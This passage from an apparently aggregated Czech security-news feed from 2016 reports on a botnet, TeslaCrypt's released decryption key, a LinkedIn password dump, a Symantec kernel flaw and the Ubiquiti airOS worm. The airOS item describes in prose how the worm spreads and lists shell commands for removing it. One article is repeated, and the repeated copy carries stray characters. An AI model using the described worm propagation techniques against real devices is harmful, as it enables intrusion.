Zotročovat jednotlivé počítače pomáhal kyberzločincům škodlivý kód známý jako Redirector.Paco, který internetem putuje už od roku 2014. Šířil se zpravidla jako příloha nevyžádaného e-mailu nebo odkaz v různých chatech a na sociálních sítích.
Napadené stroje pak útočníci zapojovali do jednoho obrovského botnetu, tedy do sítě zotročených počítačů, které zpravidla slouží k rozesílání spamu nebo útokům typu DDoS. Počítačoví piráti však v tomto případě botnet využívali k něčemu úplně jinému, pomocí něj vydělávali nemalé peníze.
Kontrolovali internetový provoz
Napadené stroje totiž používali k tomu, aby mohli ovládat jejich internetový provoz. Tak byli schopni na pozadí skrytě navštěvovat tisíce různých internetových stránek na každém jednotlivém PC, díky čemuž pak inkasovali peníze za zobrazovanou reklamu.
Bezpečnostní experti antivirové společnosti Bitdefender odhadli, že se jim podobným způsobem podařilo zotročit na milión počítačů. S ohledem na to se tak dá celkem snadno odhadnout, že s pomocí botnetu si vydělali přinejmenším několik jednotek nebo klidně i desítek miliónů dolarů.
Přesnou částku se však bezpečnostním odborníkům, kteří se případem zabývají, nepodařilo zjistit.
Z řádků výše je patrné, že se kyberzločinci snažili pracovat co nejdéle v utajení, aby uživatelé infiltraci škodlivého kódu neodhalili. Přišli by tak o cenný zdroj příjmů.
Virus útočil i v Evropě
Podle Bitdefenderu pocházela většina zotročených počítačů z Indie, Malajsie, Řecka, Spojených států, Itálie, Pákistánu, Brazílie a Alžírska. Není však vyloučeno, že se škodlivým kódem mohly nakazit také stroje tuzemských uživatelů, protože virus se objevil v některých evropských státech.
Bezpečnostní experti připomínají, že hackerům většinou usnadňují práci samotní uživatelé svým chováním. Podceňují totiž základní bezpečnostní pravidla – například klikají na přílohy v nevyžádaných e-mailech, případně neinstalují pravidelně aktualizace jednotlivých programů a operačního sytému.
Z toho všeho jsou pochopitelně kyberzločinci schopni těžit. A vydělávat díky tomu klidně i velké peníze…
Počítačoví piráti se omluvili za šíření vyděračského viru. Data je možné odemknout zadarmo
27.7.2016 Viry
Velmi netradiční zvrat nastal v případě počítačových pirátů, kteří šířili po internetu vyděračské viry. Ti se patrně nemohli už koukat na zkázu, kterou napáchal, a tak se jej rozhodli odstřihnout. Všem uživatelům se navíc omluvili. Upozornil na to server Bleeping Computer.
„Projekt končí, moc se všem omlouváme,“ uvedli neznámí kyberzločinci, kteří šířili po internetu vyděračský virus TeslaCrypt. Aby dokázali, že svou omluvu myslí skutečně vážně, připojili k ní také hlavní dešifrovací klíč. S jeho pomocí je možné zašifrovaná data odemknout i bez placení výkupného.
Sluší se však podotknout, že vyděračských virů existuje přinejmenším několik desítek různých druhů. Univerzální klíč přitom funguje pouze na již zmiňovaný TeslaCrypt.
Kyberzločinci se k nečekanému kroku podle všeho odhodlali díky jednomu bezpečnostnímu výzkumníkovi z antivirové společnosti Eset. Ten je anonymně kontaktoval přes oficiální kanál určený obětem vyděračského viru a požádal o zveřejnění univerzálního dešifrovacího klíče. Sám přitom patrně nečekal, že budou počítačoví piráti tak vstřícní.
Na základě toho vytvořili pracovníci Esetu dešifrovací nástroj, s jehož pomocí je možné uzamčená data na pevném disku snadno odemknout. Stahovat jej je možné zdarma zde.
Nástroj společnosti Eset k dešifrování dat, která byla uzamčena vyděračským virem TeslaCrypt.
FOTO: archív tvůrců
Jak útočí vyděračské viry
Na napadeném stroji dokážou vyděračské viry udělat pěkný nepořádek. Nejprve zašifrují všechna data uložená na pevném disku. Za jejich zpřístupnění pak útočníci požadují výkupné, a to klidně i několik tisíc korun.
Kyberzločinci se zpravidla snaží v majiteli napadeného stroje vzbudit dojem, že se ke svým souborům dostane po zaplacení pokuty. Ta byla údajně vyměřena za používání nelegálního softwaru apod. I proto jim celá řada lidí již výkupné zaplatila.
Zaplatit zpravidla chtějí v bitcoinech, protože pohyby této virtuální měny se prakticky nedají vystopovat. A tím logicky ani nelegální aktivita počítačových pirátů.
Ani po zaplacení výkupného se ale uživatelé ke svým datům nedostanou. Místo placení výkupného je totiž nutné virus z počítače odinstalovat. Zpřístupnit nezálohovaná data je už ale ve většině případů nemožné. V případě škodlivého kódu TeslaCrypt to však už nyní neplatí.
Na prodej je 117 milionů hesel z LinkedIn, za 2 200 dolarů
20.5.2016
Jako se všemi úniky hesel, musíte být velmi opatrní a velmi zkoumat, jestli to je pravé, vymyšlené, ale třeba i roky staré.
Přihlašovací údaje více než 117 milionů účtů (někde se uvádí i 167 milionů) z LinkedIn jsou nabízeny na prodej za něco přes 2 200 dolarů (respektive 5 BTC). Jde o e-mailové adresy a SHA1 podobu hesel. Skutečnost je ale taková, že nejspíš jde o hesla, která z této služby unikla již v roce 2012.
Podle Then there were 117 million. LinkedIn password breach much bigger than thought i samotné LinkedIn potvrdilo, že jde o uniklá data z roku 2012. Na Lupa.cz se o tomto úniku psalo ve Z LinkedIn.com uniklo 6,5 milionu hesel uživatelů, respektive o jednom z úniků, protože v roce 2012 jich podle všeho bylo několik (nebo jeden větší) a celkový počet tehdy uniklých účtů byl podstatně větší. A to je také důvod, proč je aktuálně řeč o více než 100 milionech účtů.
Na již známém haveibeenpwned.com tehdejší (ani tento nový) únik není zahrnut, ale leakedin.org už také nefunguje. Z tehdejší doby je možné stále najít An Update on LinkedIn Member Passwords Compromised přímo od LinkedIn, pokud vás zajímají roky staré detaily.
Co je podstatné si uvědomit, je, že toto není původní menší únik a že opravdu jde o hesla z roku 2012. Což také může znamenat, že i když váš e-mail a heslo do LinkedIn nebylo v předchozím úniku, může být v tomto novém. Na druhou stranu, jestli jste v roce 2012 používali LinkedIn a nezměnili si heslo, tak je asi něco špatně (změnit jste si ho asi tehdy ale museli, LinkedIn udělalo tehdy reset všech hesel).
Jakkoliv nový únik není na obvyklém testovacím webu, můžete zkusit www.leakedsource.com , kde by už i tato nová data měla být kompletní. S ohledem na to, že jde o více než 100 milionů hesel, tak by mohlo jít o skoro celou tehdejší databázi uživatelů LinkedIn. Dnes má LinkedIn přes 300 milionů účtů, z nichž ale jenom zhruba třetina jsou aktivní uživatelé.
Osobně mohu potvrdit, že na LeakedSource.com je možné v LinkedIn datech najít oba e-mailové účty, které jsem používal v roce 2012 právě na LinkedIn (a na kterých jsem měnil hesla hned poté, co se v roce 2012 zjistilo, že unikla hesla).
Zašifrovaní ransomwarem TeslaCrypt? Eset prý dokáže data zase zpřístupnit
20.5.2016
Nástroj, který dokáže obnovit soubory zašifrované pomocí ransomwaru TeslaCrypt, uveřejnil Eset. Dokáže to ale jen u novějších verzí TeslaCrypt 3 nebo 4. Novinka je ke stažení na webových stránkách dodavatele.
Operátoři ransomwaru TeslaCrypt nedávno ohlásili, že ukončují své škodlivé aktivity. Při této příležitosti jeden z analytiků Esetu anonymně kontaktoval útočníky přes kanál určený obětem TeslaCrypt a požádal jej o univerzální dešifrovací klíč (tzv. master key).
Žádost byla překvapivě kladně vyřízená, což umožnilo Esetu vytvořit řešení pro ty, kteří ztratili přístup ke svým souborům.
TeslaCrypt se poprvé objevil na scéně začátkem roku 2015 a začal se soustředit na obsah spojený s hrami, jako jsou například uložené pozice, uživatelské mapy, ale i na osobní dokumenty a obrázky – celkem šlo o 185 různých koncovek souborů.
Nástroj Esetu dokáže dešifrovat soubory zakódované TeslaCryptem s koncovkou .xxx, .ttt, .micro nebo .mp3, a samozřejmě i ty, jejich koncovka se šifrováním nezměnila.
O2 čelí v souvislosti s MS v hokeji masivním DDoS útokům
19.5.2016 Počítačový útok
Hackeři zaútočili ve čtvrtek 19. května na streamovací servery O2. Jedná se již o několikátý útok od začátku hokejového šampionátu, který zapříčinil technické problémy při online vysílání hokejového zápasu Česka proti USA a několika minutové problémy s přihlášením k mobilní službě O2 TV.
O2 před dnešním zápasem výrazně posílilo své streamovací kapacity a přijalo několik opatření, které pomáhají útoky typu DDoS odrazit.
"První útoky přicházely již minulý týden a o víkendu,"vysvětluje Václav Hanousek, šéf síťového provozu. "Přesto jsme byli minulý čtvrtek schopni poskytnout službu 320 tisicům zákazníků a přenést rekordní objem 237 Gbps. Opatření, které jsme na ochranu služby poskytované našim zákazníkům přijali, bohužel vlivem systémové chyby způsobily dnešní hodinový výpadek na pevném internetu v části Prahy a středních Čech," dodává Hanousek.
Intenzita a rozsah útoků vedly také k přetížení serverů mobilní televize O2 TV. Krátké výpadky mohli bohužel zaznamenat také diváci, kteří hokejový zápas sledovali prostřednictvím iVysílání.
Hackeři zotročili milión počítačů. Vydělávali tak velké peníze
18.5.2016 Hacking
Skupině zatím neznámých hackerů se podařilo infikovat virem na milión počítačů z různých koutů světa. Přestože jejich majitelé o tom neměli ani tušení, s pomocí jejich PC pak vydělávali velké peníze. Upozornil na to server The Hacker News.
Zotročovat jednotlivé počítače pomáhal kyberzločincům škodlivý kód známý jako Redirector.Paco, který internetem putuje už od roku 2014. Šířil se zpravidla jako příloha nevyžádaného e-mailu nebo odkaz v různých chatech a na sociálních sítích.
Napadené stroje pak útočníci zapojovali do jednoho obrovského botnetu, tedy do sítě zotročených počítačů, které zpravidla slouží k rozesílání spamu nebo útokům typu DDoS. Počítačoví piráti však v tomto případě botnet využívali k něčemu úplně jinému, pomocí něj vydělávali nemalé peníze.
Kontrolovali internetový provoz
Napadené stroje totiž používali k tomu, aby mohli ovládat jejich internetový provoz. Tak byli schopni na pozadí skrytě navštěvovat tisíce různých internetových stránek na každém jednotlivém PC, díky čemuž pak inkasovali peníze za zobrazovanou reklamu.
Bezpečnostní experti antivirové společnosti Bitdefender odhadli, že se jim podobným způsobem podařilo zotročit na milión počítačů. S ohledem na to se tak dá celkem snadno odhadnout, že s pomocí botnetu si vydělali přinejmenším několik jednotek nebo klidně i desítek miliónů dolarů.
Přesnou částku se však bezpečnostním odborníkům, kteří se případem zabývají, nepodařilo zjistit.
Z řádků výše je patrné, že se kyberzločinci snažili pracovat co nejdéle v utajení, aby uživatelé infiltraci škodlivého kódu neodhalili. Přišli by tak o cenný zdroj příjmů.
Virus útočil i v Evropěy
Podle Bitdefenderu pocházela většina zotročených počítačů z Indie, Malajsie, Řecka, Spojených států, Itálie, Pákistánu, Brazílie a Alžírska. Není však vyloučeno, že se škodlivým kódem mohly nakazit také stroje tuzemských uživatelů, protože virus se objevil v některých evropských státech.
Bezpečnostní experti připomínají, že hackerům většinou usnadňují práci samotní uživatelé svým chováním. Podceňují totiž základní bezpečnostní pravidla – například klikají na přílohy v nevyžádaných e-mailech, případně neinstalují pravidelně aktualizace jednotlivých programů a operačního sytému.
Z toho všeho jsou pochopitelně kyberzločinci schopni těžit. A vydělávat díky tomu klidně i velké peníze…y
Jaké jsou aktuálně nejčastější hrozby v Česku?
18.5.2016 Viry
Globálně nejvíce zlobí červ Bundpil, v Česku se ale momentálně nejčastěji šíří infikované přílohy e-mailu.
Žebříček deseti největších bezpečnostních hrozeb v IT za měsíc duben zveřejnil Eset. Podle něj oproti březnu výrazně stouplo rozšíření škodlivého červa Bundpil, který se šíří prostřednictvím vyměnitelných médií. Druhou nejčastější hrozbu představuje trojan Nemucod, třetí je potom Javascript Danger.ScriptAttachment. Ten je ve světovém měřítku třetí, v České republice se jedná o hrozbu nejčastější.
„Červ Bundpil obsahuje URL, ze které se snaží do napadeného zařízení stáhnout několik souborů. Ty se pak instalují a umožňují do zařízení stahovat další škodlivé kódy,“ popisuje Petr Šnajdr, expert Esetu.
Bundpil předstihl trojského koně Nemucod. I ten však nadále zaznamenával zvýšený výskyt a v žebříčku deseti největších kybernetických hrozeb za měsíc duben se posunul na druhé místo.
Nemucod používají hackeři jako prostředek pro instalaci dalších škodlivých kódů a ovládnutí infikovaného zařízení. „Jde o klasický downloader, který se šíří jako příloha e-mailových zpráv. Nejčastěji se maskuje jako faktura nebo pozvánka k soudu,“ konstatuje Šnajdr.
Nově se v desítce nejaktivnějších škodlivých kódů objevuje na třetí pozici JS/Danger.ScriptAttachment, což je škodlivý soubor, který se šíří jako příloha e-mailu a může způsobit stažení malware. „Jde o detekci, která podle obecnějších kritérií posuzuje škodlivost zprávy. Detekce JS/Danger pokrývá jiným algoritmem varianty škodlivého kódu Nemucod, a proto je část Nemucodu detekována jako JS/Danger. V českém prostředí se jedná o hrozbu nejčastější, identifikujeme ji ve více než čtvrtině všech případů,“ vysvětluje Šnajdr.
Aktuálně se v přehledu nejčastějších kybernetických hrozeb objevuje i vir Agent.XWT, který otevírá vrátka dalším infiltracím. Nejrozšířenější hrozby v první pětici uzavírá kód ScrInject, který otevírá webové HTML stránky se škodlivými skripty nebo vloženými iframe objekty, které automaticky přesměrovávají zařízení ke stažení malware.
Druhá polovina žebříčku nejaktivnějších virů už neobsahuje tak rozšířené škodlivé kódy. Na šestou pozici se v dubnu posunul trojan HTML/Refresh, který přesměrovává internetový prohlížeč na nepříliš důvěryhodná URL. Sedmou pozici si stejně jako v březnu udržel virus Rammit, který se aktivuje při každém spuštění systému a jeho pomocí může útočník na dálku vypnout nebo restartovat napadený počítač.
Na osmou pozici z březnové třetí příčky v dubnu klesl malware Agent.CR, který ke svému maskování používá soubor typu LNK a v rámci něho zneužívá ke svým aktivitám systémový program rundll32.exe.
Devátou příčku pak obsadil polymorfní virus Sality, který při každém restartu operačního systému narušuje nebo odstraňuje bezpečnostní aplikace.
Dubnový žebříček nejrozšířenějších kybernetických hrozeb uzavírá malware Agent.BZ, který podobně jako Agent.CR využívá volání škodlivé funkce ze své DLL knihovny pomocí runddl32.exe.
Top 10 hrozeb - globální přehled
Win32/Bundpil
JS/TrojanDownloader.Nemucod
JS/Danger.ScriptAttachment
Win32/Agent.XWT
HTML/ScrInject
HTML/Refresh
Win32/Ramnit
LNK/Agent.CR
Win32/Sality
LNK/Agent.BZ
Kritická chyba v antivirech Symantec a Norton umožňuje atak hackerů
18.5.2016 Zranitelnosti
Chyba v jádru antiviru, užívaném hned v několika produktech firmy Symantec, je velmi snadno zneužitelná. Podle bezpečnostního technika Googlu, Tavise Ormandyho, který chybu objevil, může být zranitelnost zneužitá ke spuštění nakaženého kódu na počítačích, a to i vzdáleně.
Jediné, co útočník musí udělat, je poslat e-mail s vadným souborem jako přílohu nebo přesvědčit uživatele, aby klikl na nebezpečný odkaz.
Samotné spuštění souboru již není třeba: Jádro antiviru používá ovladač k zachycení všech systémových operací a automaticky soubor „projede“ ve chvíli, kdy jakkoli pronikne do systému.
Již v pondělí firma chybu opravila v Anti-Virus Engine (AVE) aktualizaci verze 20151.1.1.4 skrze službu LiveUpdate. Bezpečnostní vadou je přetečení bufferu, které mohlo nastat během parsování spustitelných souborů s vadným záhlavím.
Přípona souboru nehraje roli, má-li záhlaví označující jej jako přenosný spustitelný soubor, zapackovaný pomocí ASPacku, komerčního kompresního softwaru.
Zdaleka nejhorší zprávou však je, že Symantec AVE takové soubory rozbaluje uvnitř kernelu, tedy přímo v jádru operačního systému, oblasti s nejvyššími pravomocemi. To znamená, že úspěšné nakažení systému může vést ke kompletní ztrátě moci nad celým systémem.
„Na Linuxu, Macu a dalších unixových platformách může tento proces způsobit vzdálené přetečení heapu (haldy) v procesech Symantecu nebo Nortonu,“ vysvětluje Ormandy v článku k tématu. „Ve Windows tento proces vede k přetečení paměti přidělené kernelu, jak je sken jádra v kernelu postupně načítán, což z toho činí vzdálenou zranitelnost ring0 memory corruption – o moc horší už to být nemůže.“
Symantec zranitelnost ohodnotil na škále CVSS na 9,1 z 10 maximálních, tedy jako extrémně nebezpečnou.
„Nejčastější ukazatel úspěšného útoku by bylo okamžité selhání systému, tedy modrá obrazovka smrti ,“ popsala společnost v článku.
Uživatelé by se měli ujistit, že nainstalovali nejnovější možné aktualizace, dostupné pro jejich Symantec antivirové produkty.
Jde o nejnovější z dlouhé řady kritických chyb nalezených Ormandym a jinými bezpečnostními analytiky v antivirových produktech z posledních let. Většina z nich nepřestává výrobce antivirů kritizovat za jejich tendenci pokračovat s nebezpečnými skeny souborů, které v minulosti vedly ke zneužití chyb pomocí získaných pravomocí kernelu.
CSIRT varuje před útoky na Ubiquity jednotky. Virus kosí Wi-Fi sítě v Česku
17.5.2016 Zdroj: Lupa.cz Viry
V poslední době obdrželo Ubiquiti několik zpráv o napadení systému airOS na neaktualizovaných zařízeních. Odhaduje se, že by bez internetu mohly být řádově tisíce uživatelů.
Tak se nám zase viry dostaly do republiky. „Jedná se o HTTP/HTTPS malware, který útočí převážně na starší zařízení bez aktuálního firmwaru. Vir nevyžaduje ověření, infikuje i zaheslovaná zařízení. První napadá jednotky s veřejnou IP adresou a pak se šíří dál do sítě. Podle aktuálních informací postihl tento virus také klienty několika poskytovatelů internetového připojení v ČR,“ tvrdí varování na stránkách CSIRTu.
Ubiquity je značka síťového hardware, která je v tuzemsku populární především mezi lokálními providery. Už včera varoval i prodejce síťových prvků i4wifi, který popisuje i příznaky útoku a možné řešení situace s tím, že v některých případech je možné vyřešit problém na dálku.
Analytik Pavel Bašta bezpečnostního týmu popsal pro ČTK princip viru tak, že dotčená zařízení nastaví do tzv. výchozího stavu. Využívá přitom chybu ve webových službách, která má za následek úplnou kontrolu nad zařízením. Tato zranitelnost by měla být opravena ve firmware verze 5.6.5.
Problém se může týkat podle odhadů řádově tisíců uživatelů. Česko je totiž v Evropě bezdrátovou velmocí. A to především kvůli liknavému přístupu tehdejšího Českého Telecomu k rozšiřování ADSL. Na přelomu tisíciletí tak vzali lidé na připojení k rychlému internetu do svých rukou a po celé republice vznikala malá sdružení, která se postupně proměňovala v providery.
Do pátrání po škodách se zapojilo i další veřejnoprávní médium. Podle Radiožurnálu s infekcí bojuje například jihlavská firma M-Soft, kde technici musí osobně navštívit 1500 domácností. Další napadené antény opravují na dálku. Podle informací firmy jsou stejné problémy i na Děčínsku a Náchodsku.
Problémy v minulých dnech však hlásili i poskytovatelé v Havlíčkově Brodě, Mnichově Hradišti nebo v Příbrami. Starší zařízení po napadení přestala fungovat. Problémy začaly v sobotu a pracovníci havlíčkobrodského providera museli dojet k desítkám zákazníků a zařízení znovu nastavit.
Virus napadl tisíce routerů v Česku, varoval Národní bezpečnostní tým
17.5.2016 Viry
Národní bezpečnostní tým CSIRT.CZ v úterý varoval před novým počítačovým virem, který se šíří Českem jako lavina. Zaměřuje se výhradně na routery – brány do světa internetu, prostřednictvím kterých se pak počítačoví piráti dostanou do celé počítačové sítě. Infikovaných strojů mají být v tuzemsku tisíce.
Virus útočí nejčastěji na neaktualizovaná zařízení. „Jedná se o HTTP/HTTPS malware, který útočí převážně na starší zařízení bez aktuálního firmwaru. Vir nevyžaduje ověření, infikuje i zaheslovaná zařízení,“ varoval Pavel Bašta, bezpečnostní analytik CSIRT.CZ, který je provozován sdružením CZ.NIC.
„Podle aktuálních informací postihl tento virus také klienty několika poskytovatelů internetového připojení v ČR,“ doplnil Bašta.
Česká tisková kancelář upřesnila, že napadené přístroje jsou hlášeny například na Děčínsku či Náchodsku, ale také v Havlíčkově Brodě, Mnichově Hradišti nebo Příbrami. Největší problémy ale podle Radiožurnálu má firma M-Soft z Jihlavy, kde technici musejí osobně navštívit 1500 domácností. Po celé republice jsou tak tisíce infikovaných routerů.
Jak poznat, že je router zavirovaný?
Problémy se podle všeho týkají pouze uživatelů, kteří přijímají internet prostřednictvím wi-fi a mají router se systémem airOS. Lidé používající například kabelové rozvody či služby mobilních operátorů (modemy se SIM kartami) by v ohrožení být neměli.
Že je router zavirovaný, mohou uživatelé poznat například podle toho, že jim přestane z připojených počítačů zcela fungovat internetové připojení, případně se při snaze o připojení na nějakou webovou stránku zobrazí úplně jiný web.
Přesně to se stalo už v minulosti kvůli zranitelnosti známé jako „rom-0“. Místo serverů, jako jsou například Seznam.cz nebo Google.com, se poškozeným zobrazila hláška o nutnosti instalace flash playeru. Místo té se ale do PC stáhnul další virus. Útočníci tak rázem měli přístup nejen k routeru, ale i k připojenému počítači.
Útoky jsou stále častější
Na brány do světa internetu se zaměřují kyberzločinci stále častěji. Využívají toho, že zabezpečení těchto internetových zařízení uživatelé především v domácnostech velmi podceňují, někdy to ale platí i o firmách. Březnová studie Cisco Annual Security Report totiž ukázala, že devět z deseti internetových zařízení má slabá místa.
Hlavní problém je podle bezpečnostních expertů v tom, že routery není možné chránit antivirovými programy, jako je tomu u počítačů. I tak ale nejsou uživatelé úplně bezbranní. „Hlavní způsob, jak této hrozbě předejít, představuje upgrade firmwaru routeru na aktuální verzi a nepoužívat mnohdy triviální přednastavené přihlašovací jméno a heslo. Rovněž je vhodné zvážit přihlašování k routeru pouze z vnitřní sítě, a nikoliv z internetu,“ uvedl již dříve Pavel Matějíček, manažer technické podpory společnosti Eset.
Do konfigurace routerů by se nicméně neměli pouštět méně zkušení uživatelé. Mohou totiž nevhodným nastavením způsobit více škody než užitku. Paradoxně tak mohou klidně otevřít zadní vrátka pro útočníky.
Červ Bundpil otevírá zadní vrátka do systému. Přes ně pak proudí další viry
17.5.2016 Viry
Především přes vyměnitelná média se šíří nebezpečný červ, kterého bezpečnostní experti nazývají Bundpil. Ten je aktuálně světově nejrozšířenější hrozbou a v počítači dokáže vytvořit zadní vrátka pro další škodlivý software, varovala antivirová společnost ESET.
Bundpil se nejčastěji šíří prostřednictvím nejrůznějších USB flashek a externích disků. „Červ obsahuje URL, ze které se snaží do napadeného zařízení stáhnout několik souborů. Ty se pak instalují a umožňují do zařízení stahovat další škodlivé kódy,“ uvedl Petr Šnajdr, bezpečnostní expert společnosti ESET.
To jinými slovy znamená, že díky Bundpilu mohou počítačoví piráti propašovat do cizího počítače prakticky jakýkoliv jiný virus. Teoreticky se s využitím těchto nezvaných návštěvníků mohou dostat k cizím uživatelským datům nebo například odposlouchávat probíhající komunikaci, a tedy i snadno odchytávat přihlašovací údaje k různým službám.
Šíří vyděračské viry
Zákeřný červ dělá bezpečnostním expertům dokonce větší vrásky na čele než škodlivý kód Nemucod, který ještě před pár týdny žebříčku nejrozšířenějších hrozeb kraloval. Ten přitom dokáže prakticky to samé jako Bundpil – uhnízdí se v počítači a může potom stahovat další nezvané návštěvníky.
Nejčastěji stahuje vyděračské viry. „Aktuálně stahuje především různé typy ransomwaru, například známý TeslaCrypt nebo Locky. Následně tento škodlivý kód začne šifrovat obsah počítače a uživateli zobrazí oznámení, že za dešifrování počítače musí zaplatit,“ varoval již dříve Šnajdr.
Nemucod je stále druhým nejrozšířenějším virem na světě, ale v dubnu se nešířil tak agresivně jako absolutní král žebříčku, červ Bundpil.
Útočí i v Česku
Na pozoru by se uživatelé měli mít také před hrozbou s krkolomným názvem JS/Danger.ScriptAttachment. Ta se do desítky nejrozšířenějších virů v globálním měřítku dostala vůbec poprvé, přesto vyskočila rovnou na třetí příčku.
Je tedy zřejmé, že se tato hrozba šíří až nečekaně rychle.
Jde o škodlivý soubor, který se šíří jako příloha e-mailu a také otevírá zadní vrátka do operačního systému. „V českém prostředí se jedná o hrozbu nejčastější, identifikujeme ji ve více než čtvrtině všech případů,“ vysvětlil Šnajdr.
Deset nejrozšířenějších virových hrozeb za měsíc duben
1. Win32/Bundpil
2. JS/TrojanDownloader.Nemucod
3. JS/Danger.ScriptAttachment
4. Win32/Agent.XWT
5. HTML/ScrInject
6. HTML/Refresh
7. Win32/Ramnit
8. LNK/Agent.CR
9. Win32/Sality
10. LNK/Agent.BZ
Motherfucker: virus v bezdrátových zařízeních Ubiquiti (AirOS)
17.5.2016 Zdroj: root.cz Viry
Zařízení s operačním systémem AirOS jsou ohrožena kvůli vážné bezepčnostní mezeře, která dovoluje modifikovat souborový systém bez znalosti přihlašovacích údajů. Jak se bránit?
Před pěti lety se kvůli bezpečnostní díře začal šířit virus Skynet. Možná si pamatujete na nahodilé restartovaní zařízení. Před měsícem byla popsána nová bezpečností díra ve všech typech zařízení AirOS. Ta umožňuje útočníkovi nahrát jakýkoliv soubor kamkoliv do souborového systému Wi-Fi zařízení bez znalosti přihlašovacích údajů.
V pondělí 16. května byl konečně vydán opravný firmware verze 5.6.5, který tuto chybu řeší. Jak se vlastně dostane do nezabezpečeného zařízení?
Infekce zařízení
Jelikož exploit umožňuje nahrání souboru kamkoliv do souborového systému, virus si nahraje veřejný klič SSH do routeru (bez nutnosti autentizace). Také zkopíruje sám sebe do zařízení. Přihlásí se pomocí SSH a nainstaluje se. Tedy rozbalí si tar, zapíše se do souboru rc.poststart a zapíše se do perzistentní paměti. Pak se restartuje.
Po restartu
Znovu se rozbalí z taru, a spustí soubor mother. Tato matka si nastaví firewall na HTTP/HTTPS – tím můžete poznat infikované zařízení. Dále inicializuje stažení příkazu curl a několika knihoven pomocí wget. Příkaz curl potřebuje pro své šíření a nevejde se do perzistentní paměti.
Následně spustí search a začne skenovat adresní prostor. Pokud najde zařízení které by mohlo být „airos“, zkusí na něj nahrát pomocí HTTP (HTTPS) opět svůj veřejný klíč a následně se zkusí pomocí SSH přihlásit do zařízení a nainstalovat se.
To však není vše. Skript si ukládá IP adresu pravděpodobně infikovaných zařízení a zkusí je všechny přibližně jednou za 66 666 sekund (18,5 hodiny) resetovat pomocí webového přístupu do továrního nastavení – skript fucker. Reset se podaří jen na zařízení, které se nepodařilo správně infikovat a samozřejmě mají zranitelný firmware.
Dále na hostitelském zařízení pustí odpočet na 666 666 sekund (7,5 dne) a po uplynutí přenastaví ESSID na „motherfucker“ a následně zařízení vypne. Detaily naleznete na fóru ubnt.
Jak se bránit?
Především aktualizovat na firmware 5.6.5! Zároveň je dobré nasadit firewall na HTTP nebo HTTPS, stačí jej nastavit ve webovém rozhraní zařízení. Dále je možné nastavit naslouchání zařízení na jiný než výchozí port 80 či 443. Zkušenější samozřejmě mohou využít vlastních skriptů v ubnt.
Pokud už jste byli napadeni, můžete manuálně odstranit virus pomocí SSH:
# cd /etc/persistent/
# rm mf.tar
# rm rc.poststart
# rm -R .mf
# sed -i "/^mother/d" /etc/passwd
# cfgmtd -p /etc/ -w
# reboot
Doufám, že všichni stihnete aktualizovat dříve, než naši republiku pokryje Wi-Fi nápis „motherfucker“.
Hackeři zaútočili na další banku, získali její SWIFT kódy
15.5.2016 Hacking
Společnost pro celosvětovou mezibankovní finanční telekomunikaci (SWIFT) upozornila na nový kybernetický útok, který byl namířen proti nejmenované komerční bance. SWIFT, která dohlíží na mezinárodní peněžní transfery, proto vyzvala svoje klienty, aby neodkladně zkontrolovali svoje systémy zabezpečení.
Hackeři k útoku na program pro čtení PDF souborů použili malware, tedy software, jehož cílem je infiltrovat nebo zničit počítačový systém bez souhlasu uživatele. Útočníkům se prý podařilo rozesílat swiftové zprávy využívající kódy dotčené banky. SWIFT, která má sídlo v Belgii, ale neuvedla název banky ani to, zda nějaké peníze zmizely.
Systém SWIFT se používá k mezinárodnímu platebnímu styku. Každá banka má v rámci tohoto systému jedinečný kód, kterým se identifikuje. Systém využívá zhruba 11 000 finančních institucí po celém světě.
Soudní experti se podle organizace SWIFT domnívají, že použití malwaru není ojedinělý případ, "ale součást širší a velmi adaptivní kampaně cílící na banky".
Při útoku byly využity nástroje a techniky podobné těm, které byly využity při únorové krádeži 81 miliónů dolarů (1,9 miliardy Kč) z účtu bangladéšské centrální banky, vedeného u Federální rezervní banky (Fed) v New Yorku.
Bankéři chtěli ušetřit…
Vyšetřování této velké bankovní loupeže letos v dubnu ukázalo, že bankéři šetřili a nepoužívali firewall. Jinými slovy tak hackerům banka naservírovala peníze doslova na zlatém podnosu.
Firewall je síťové zařízení, které slouží k zabezpečení počítačových sítí. Jeho hlavním úkolem je tedy bránit počítače a servery v rámci dané sítě, aby se na ně nedostaly škodlivé viry a další nezvaní návštěvníci.
Podle vyšetřovatelů bylo zřejmé, že se lidé starající o miliardové transakce snažili ušetřit. Další síťová technika, kterou vyšetřovatelé kontrolovali, totiž byla pořízena z druhé ruky. Například nákupem síťových přepínačů z bazaru přitom banka ušetřila maximálně tak pár stovek dolarů.
Aktualizace opravují nebezpečné trhliny v Internet Exploreru i Windows
13.5.2016 Zranitelnosti
V rámci pravidelných měsíčních updatů vydala společnost Microsoft i záplaty pro chyby, které byly odhaleny v operačním systému Windows a webových prohlížečích Internet Explorer a Edge. S instalací aktualizací by lidé neměli otálet, protože opravují kritické zranitelnosti.
V produktech amerického softwarového gigantu bylo nalezeno dohromady sedm kritických chyb. Je velmi pravděpodobné, že po jejich oficiálním odhalení se je budou snažit zneužít počítačoví piráti.
Kromě operačního systému Windows a zmiňovaných webových prohlížečů byly stejně nebezpečné trhliny nalezeny také v kancelářském balíku Office. Jedna z trhlin se týká také enginu VBScript, tedy skriptovacího jazyku určeného ke vkládání kódu do webových stránek.
Rizika jsou velká
Jako kritické jsou vždy označovány chyby, jež mohou kyberzločinci zneužít k tomu, aby do počítače propašovali prakticky libovolného nezvaného návštěvníka.
Stačí jim k tomu vytvořit podvodnou internetovou stránku, prostřednictvím které vzdáleně spustí škodlivý kód. Touto cestou se mohou dostat k souborům uloženým na pevném disku i sestavu na dálku ovládnout.
Takový stroj se pak klidně i bez vědomí uživatele může stát součástí botnetu (síť zotročených počítačů), který kyberzločinci zpravidla zneužívají k rozesílání spamu nebo k DDoS útokům.
S instalací neotálet
Vedle updatů pro kritické bezpečnostní chyby vyšla řada aktualizací, které jsou označeny jako důležité. Ani s jejich instalací by uživatelé neměli otálet, protože mohou mít vliv na funkčnost samotného operačního systému Windows nebo některých programů.
Stahovat všechny opravy pro kritické a důležité trhliny, které vyšly společně s balíkem pravidelných běžných aktualizací, je možné prostřednictvím služby Windows Update.
Flash Player opět terčem útoků, Adobe varuje před kritickým zneužitím
12.5.2016 Zranitelnosti
Adobe Systems momentálně řeší kritickou zranitelnost ve Flash Playeru, kterou se již hackerům podařilo zneužít. Mezitím firma vydala opravy pro další zasažené aplikace, kterými jsou Reader, Acrobat a ColdFusion, na záplatě pro Flash Player se ale ještě pracuje.
